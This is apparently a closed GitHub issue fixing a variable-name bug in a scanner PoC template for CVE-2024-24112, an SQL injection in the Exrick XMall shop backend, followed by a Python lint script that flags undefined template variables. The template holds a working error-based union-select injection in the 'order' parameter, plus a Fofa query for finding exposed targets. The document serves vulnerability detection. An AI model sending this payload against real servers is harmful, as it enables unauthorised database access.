Closed scarleast closed 8 months ago
In the expression, the variable passed to md5 should be randstr, but in the PoC it is rand.
```yaml
id: CVE-2024-24112

info:
  name: Exrick XMall 开源商城 SQL注入漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: app="XMall-后台管理系统"
  reference:
    - https://mp.weixin.qq.com/s/HqVQrUr6iRv94BmrVd_gOw
  tags: cve,cve2024,sqli
  created: 2024/02/21

set:
  randstr: randomInt(200000000, 210000000)
rules:
  r0:
    request:
      method: GET
      path: /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,md5({{randstr}}),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136
    expression: response.status == 200 && response.body.bcontains(bytes(md5(string(randstr))))
expression: r0()
```
Thanks, this has been fixed and the update has been pushed to GitHub.
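The mismatch reported in this issue (a rule expression referring to `rand` while `set:` only defines `randstr`) can be caught before a template ships. The following lint check is an added example, not part of the issue or of the scanner's own code; it uses a simple line-based parse rather than a YAML library, the `BUILTIN_ROOTS` list is an assumption, and the sample template is constructed with a harmless path.

```python
import re

# Assumed names that expressions may use without declaring them in `set:`.
BUILTIN_ROOTS = {"response", "request", "true", "false"}

def set_variables(poc):
    """Names declared under the top-level `set:` block."""
    names, in_set = set(), False
    for line in poc.splitlines():
        if re.match(r"^\S", line):            # a new top-level key starts
            in_set = line.startswith("set:")
        elif in_set:
            m = re.match(r"^\s+([A-Za-z_]\w*)\s*:", line)
            if m:
                names.add(m.group(1))
    return names

def referenced_variables(poc):
    """Variables used as {{name}} placeholders or as bare names in expressions."""
    refs = set(re.findall(r"\{\{\s*([A-Za-z_]\w*)\s*\}\}", poc))
    for expr in re.findall(r"^\s*expression:\s*(.+)$", poc, re.M):
        expr = re.sub(r'"[^"]*"|\'[^\']*\'', "", expr)   # drop string literals
        # Keep identifiers that are neither members (.x) nor calls (x(...)).
        refs.update(re.findall(r"(?<![\w.])([A-Za-z_]\w*)\b(?!\s*\()", expr))
    return refs

def undefined_variables(poc):
    """Referenced names that `set:` never defines."""
    return referenced_variables(poc) - set_variables(poc) - BUILTIN_ROOTS

# Constructed template reproducing only the naming bug from the issue.
BROKEN = """\
id: constructed-example
set:
  randstr: randomInt(200000000, 210000000)
rules:
  r0:
    request:
      method: GET
      path: /echo?v={{randstr}}
    expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
expression: r0()
"""
FIXED = BROKEN.replace("string(rand)", "string(randstr)")

if __name__ == "__main__":
    print("broken:", sorted(undefined_variables(BROKEN)))
    print("fixed: ", sorted(undefined_variables(FIXED)))
```

Run over a template directory in CI, a non-empty result marks a rule that can never match or that fails at evaluation time, which for a detection template means a silent false negative.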